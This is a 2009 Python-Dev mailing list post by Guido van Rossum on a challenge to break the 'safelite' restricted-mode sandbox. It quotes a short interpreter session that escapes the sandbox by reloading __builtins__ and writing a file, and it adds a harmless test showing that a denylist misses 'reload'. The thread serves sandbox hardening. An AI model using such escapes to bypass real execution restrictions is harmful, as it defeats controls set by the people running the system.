[Python-Dev] Challenge: Please break this! (was: Reviving restricted mode)

Guido van Rossum guido at python.org
Mon Feb 23 22:36:47 CET 2009


On Mon, Feb 23, 2009 at 1:12 PM, Victor Stinner
<victor.stinner at haypocalc.com> wrote:
>> The challenge is simple:
>>
>> * Open a fresh Python interpreter
>> * Do: >>> from safelite import FileReader
>> * You can use FileReader to read files on your filesystem
>> * Now find a way to *write* to the filesystem from your interpreter
>
> Well, the challenge is to get access to a module. And... it's quite simple :-p
>
> $ ./python
> >>> from safelite import FileReader
> >>> __builtins__.file
> Traceback (most recent call last):
>  File "<stdin>", line 1, in <module>
> AttributeError: 'module' object has no attribute 'file'
> >>> reload(__builtins__)
> <module '__builtin__' (built-in)>
> >>> file('0wn3d', 'w').write('w00t\n')
> >>>
> $ cat 0wn3d
> w00t
>
>> Dinner and drinks on me for an evening -- when you are next in London
>> or I am in your town -- to the first person who manages to break
>> safelite.py and write to the filesystem.
>
> Cool. It's a good reason to go to Pycon UK this year ;-)

Tav should have made another stipulation: the attack must not be
trivial to fix. This one seems trivial, e.g. by adding 'reload' to the
list in secure_python_builtins().

-- 
--Guido van Rossum (home page: http://www.python.org/~guido/)
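
The denylist point above, as an added example that is not part of the original message and is not safelite's code: a regression check showing that names deleted from a module come back when a reload helper is left exposed, and stay gone once 'reload' is on the denylist too. It assumes Python 3's importlib.reload on a constructed stand-in module instead of Python 2's reload(__builtins__); `standin_builtins`, `harden`, `names_restored` and `helpers` are hypothetical names.

```python
import importlib
import sys
import tempfile
from pathlib import Path

# Constructed stand-in for a builtins-like module. Its "file" only returns a
# tuple; it mimics the name used in the thread and never touches the disk.
STAND_IN_SOURCE = 'def file(name, mode="r"):\n    return (name, mode)\n'


def harden(module, helpers, denylist):
    """Denylist hardening: drop each denied name from the module's
    attributes and from the helpers exposed to sandboxed code."""
    for name in denylist:
        helpers.pop(name, None)
        if hasattr(module, name):
            delattr(module, name)


def names_restored(denylist, modname="standin_builtins"):
    """Return the denied names that are reachable again after sandboxed
    code has used whatever reload helper the denylist left exposed."""
    with tempfile.TemporaryDirectory() as tmpdir:
        Path(tmpdir, modname + ".py").write_text(STAND_IN_SOURCE)
        sys.path.insert(0, tmpdir)
        try:
            importlib.invalidate_caches()
            module = importlib.import_module(modname)
            helpers = {"reload": importlib.reload}  # hypothetical exposed set
            harden(module, helpers, denylist)
            reload_fn = helpers.get("reload")
            if reload_fn is not None:
                # Re-executes the module source in the same namespace,
                # which redefines every name the hardening step deleted.
                reload_fn(module)
            return sorted(n for n in denylist if hasattr(module, n))
        finally:
            sys.path.remove(tmpdir)
            sys.modules.pop(modname, None)


if __name__ == "__main__":
    print(names_restored(["file"]))            # reload left exposed
    print(names_restored(["file", "reload"]))  # reload denied as well
```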

